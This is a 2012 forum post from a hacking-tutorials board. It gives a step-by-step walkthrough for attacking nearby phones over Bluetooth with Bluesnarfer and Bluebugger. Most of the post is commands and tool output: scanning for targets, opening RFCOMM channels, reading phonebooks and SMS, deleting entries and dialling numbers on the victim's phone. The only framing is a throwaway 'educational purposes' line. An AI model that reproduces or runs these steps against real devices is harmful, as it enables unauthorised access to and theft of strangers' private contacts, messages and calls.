TGS Forum
Hello Guest,

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features.

By joining this community for FREE, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, & many other special features.

Registration is fast, simple & absolutely free, so please, join our community today!
TGS Forum
Hello Guest,

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features.

By joining this community for FREE, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, & many other special features.

Registration is fast, simple & absolutely free, so please, join our community today!
TGS Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
PortalHomeLatest imagesRegisterLog in

 

 [TUT] BLUETOOTH HACKING with Bluebugger and Bluesnarfer

Go down 
AuthorMessage
ungli
Moderator
Moderator
ungli


Points : 497
Posts : 222
Join date : 2011-04-05
Age : 32

[TUT] BLUETOOTH HACKING  with Bluebugger and Bluesnarfer Empty
PostSubject: [TUT] BLUETOOTH HACKING with Bluebugger and Bluesnarfer   [TUT] BLUETOOTH HACKING  with Bluebugger and Bluesnarfer Icon_minitimeSat Jun 30, 2012 10:25 am

Low success rate so you have to keep on trying ..


Bluebugger

Bluebugging is a form of bluetooth attack often caused by a lack of awareness. In progression of discovery date to society, bluetooth attacks were first seen with the advent of Bluejacking, followed by Bluesnarfing and Bluebugging.

Bluebugging is best known for attacking the Nokia Phones. This is simply because of it being an earlier model. This phone's installation included a faulty implementation of Bluetooth whichhas since been updated thanks to newer firmware (pinware authentication and/or PIN entry) available to each customer.

This newer firmware does not stop hackers from penetrating these devices.Rather it will only slow them down for a short time period. For the average user personal security (use and protection of one's multiple digit based PIN) and situational awareness can make this tasking much more difficult and force those committing Bluebugging to rely on special hardware and an enormous amount of computing power for success.

You need

BACKTRACK 4

Bluesnarfer and Bluebugger commands

Configure Bluetooth device with the following command:

bt ~ # mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0


That was for Bluesnarfer and now for bluebugger the following command:

bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0


Than type the following command:

bt ~ # hciconfig hci0 up


Now the bluetooth adaptor should be ready. Now typew the following command:

bt ~ # hciconfig hci0


You should see somthing like this:

hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0


For scanning other Bluetooth devices type the following command:

bt ~ # hcitool scan hci0


You should see all the devices in the area. You can also use Btscanner and Btscanner has a bruteforce scanner for discovering hidden devices.


Now note the name and MAC of the target and let's move on. First thing lets try to ping are target. Type the following command:

l2ping (target MAC)


Next we need to find out more about the target device so we need blueprint with the following command:

sdptools browse --tree --l2cap (target MAC)


Now type the following command:

bt ~ # bluesnarfer


Now you see something like this:

bluesnarfer version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info


Type the following bluesnatfer command:

bluesnarfer [options] -C 7 -b (taget MAC)

bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55 (example)


Type the following Bluebugger command:

bluebugger -h


Now you should get something like this:

bluebugger 0.1
-----------------------------------------

Usage: bluebugger [OPTIONS] -a (addr) [MODE]

-a (addr) = Bluetooth address of target

Options:
--------
-m (name) = Name to use when connecting (default: '')
-d (device) = Device to use (default: '/dev/rfcomm')
-c (channel) = Channelto use (default: 17)
-n = No device name lookup
-t (timeout) = Timeout in seconds for name lookup (default: 5)
-o (file) = Write output to (file)

Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial (num) = Dial number
ATCMD = Custom Command (e.g. '+GMI')

NOTE: Modes can be combined, e.g. 'info phonebook +GMI'


Now type the following command:

bluebugger [OPTIONS] -c 7 -a (target MAC) [MODE]

bluebugger -m ungli.baba-c 7 -a 00:11:22:33:44:55 dial 0845KIM (example)


And again you should see some results. If after using bluebugger you getoperation already in progress error type:

hciconfig hci0 down
hciconfig hci0 reset
hciconfig hci0 up


Basic Commands:

lsusb detection of the type or device producer
hciconfig hci0 up for bluetooth device activation
hciconfig -a for detection of services about your own device
hcitool scan hci0 for ether scan
sdptool browse bd_addr fingerprint available devicees


Detection of BlueToothe device:

hcitool scan


Configuration discovery and device detection:

hciconfig hci0


Every BlueTooth device has assigned a so called class. The command for finding out the class is:

hciconfig hci0 class


Change of Class device:

hciconfig hci0 class 0×0000


For hcitool or hcidump:

hcitool [options] [command parameters] or hcidump [options] [filter]

RFCOMM PORTS ARE GOLD MINES .. IF YOU PICK RIGHT ONES YOU WOULD PROGRESS WELL.. MANY RFCOMM PORTS MORE THAN 40... SO YOU MUST KEEP ON TRYING .. I HAVENT TRIED IT ON MANY FONES SO I M NOT SURE OF ITS SUCESS RATE ... GOOD LUCK

FOR EDUCATIONAL PURPOSES ONLY WTF
Back to top Go down
 
[TUT] BLUETOOTH HACKING with Bluebugger and Bluesnarfer
Back to top 
Page 1 of 1
 Similar topics
-
» [HOT] How To Setup Direct LAN Connection Using Bluetooth

Permissions in this forum:You cannot reply to topics in this forum
TGS Forum :: Hacking Section :: Hacking Tutorials-
Jump to:  
Create a forum on Forumotion | ©phpBB | Free forum support | Report an abuse | Forumotion.com